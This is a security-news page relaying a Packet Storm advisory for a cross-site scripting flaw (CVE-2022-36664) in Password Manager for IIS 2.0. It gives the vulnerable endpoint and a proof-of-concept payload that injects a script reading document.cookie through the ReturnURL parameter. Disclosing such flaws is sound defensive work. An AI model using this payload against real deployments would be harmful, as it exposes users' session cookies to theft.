Security
Headlines
HeadlinesLatestCVEs

Headline

Password Manager For IIS 2.0 Cross Site Scripting

Password Manager for IIS version 2.0 suffers from a cross site scripting vulnerability.

Packet Storm
Open in Source
#xss#vulnerability#windows#auth#sap
# Exploit Title: *XSS*# Exploit Author: *VP4TR10T*# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/<http://passwordmanager.adiscon.com/en/manual/>*# Software Link:*http://passwordmanager.adiscon.com/<http://passwordmanager.adiscon.com/>*# Version: *Version 2.0*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664*Affected URI (when trying to change user password):POST /isapi/PasswordManager.dll HTTP/1.1HTTP Payload (Affected Parameter ):ReturnURL=<script>alert(document.cookie)</script>*Cordially,*

Related news

CVE-2022-36664: Password Manger for IIS * User Manual * Version 1.0

Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution
Packet Storm